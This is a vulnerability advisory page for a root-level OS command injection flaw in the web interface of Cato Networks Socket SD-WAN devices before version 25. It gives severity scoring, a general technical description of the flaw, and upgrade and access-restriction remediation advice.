EUVD-2025-209145
GHSA-x58h-63cq-h3q4
CVSS Vector
CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:L/VA:H/SC:N/SI:N/SA:H/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
Lifecycle Timeline
3Tags
Description
Cato Networks’ Socket versions prior to 25 contain a command injection vulnerability that allows an authenticated attacker with access to the Socket web interface (UI) to execute arbitrary operating system commands as the root user on the Socket’s internal system.
Analysis
Command injection in Cato Networks Socket (versions prior to 25) enables authenticated administrators with web interface access to execute arbitrary commands as root on the underlying system. The vulnerability requires high-level privileges (CVSS PR:H) but offers complete system compromise once accessed, with network-based attack vector and low complexity. No public exploit identified at time of analysis, though the command injection class (CWE-78) is well-understood and straightforward to weaponize once administrative credentials are obtained.
Technical Context
This is an OS command injection vulnerability (CWE-78) in the web-based management interface of Cato Networks Socket, a software-defined wide area network (SD-WAN) edge device. Command injection occurs when user-supplied input is improperly sanitized before being passed to system shell commands, allowing attackers to break out of intended command context and execute arbitrary OS commands. The affected component runs with root privileges, representing the highest level of system access on Linux/Unix-based systems. The vulnerability exists in the Socket web UI administration panel, which is typically used for device configuration, monitoring, and management tasks. Given the CVSS 4.0 vector shows network attack vector (AV:N) with low attack complexity (AC:L), the flaw is likely in a web form input field, API parameter, or configuration setting that directly or indirectly feeds into a system() call or similar command execution function without proper input validation or parameterization. The CPE identifier cpe:2.3:a:cato_networks:socket confirms this affects Cato Networks' Socket product line across all versions prior to the remediated release.
Affected Products
Cato Networks Socket versions prior to version 25 are affected by this command injection vulnerability. The CPE identifier cpe:2.3:a:cato_networks:socket:*:*:*:*:*:*:*:* indicates all Socket product variants below the fixed version are vulnerable. Socket is Cato Networks' SD-WAN edge appliance that connects branch offices and remote sites to the Cato SASE cloud platform. Organizations running Socket software versions in the 24.x series or earlier should consider themselves affected. The vendor advisory is available at https://support.catonetworks.com/hc/en-us/articles/33184937283357-CVE-2025-14213-Socket-WebUI-OS-Command-Injection for specific version identification and impact scope.
Remediation
Upgrade Cato Networks Socket to version 25 or later, which remediates the command injection vulnerability in the web interface. Organizations should prioritize updating Internet-facing Socket devices or those in high-security environments. As an interim risk mitigation measure, restrict administrative web UI access to trusted management networks using firewall rules or VPN-only access, enforce strong multi-factor authentication for all administrative accounts, and audit administrative access logs for suspicious command execution patterns. Review and rotate administrative credentials if any unauthorized access is suspected. Contact Cato Networks support for deployment-specific guidance. Full vendor advisory and update instructions are available at https://support.catonetworks.com/hc/en-us/articles/33184937283357-CVE-2025-14213-Socket-WebUI-OS-Command-Injection. Monitor Cato's security bulletin page for any additional patches or detection guidance.
Priority Score
Share
External POC / Exploit Code
Leaving vuln.today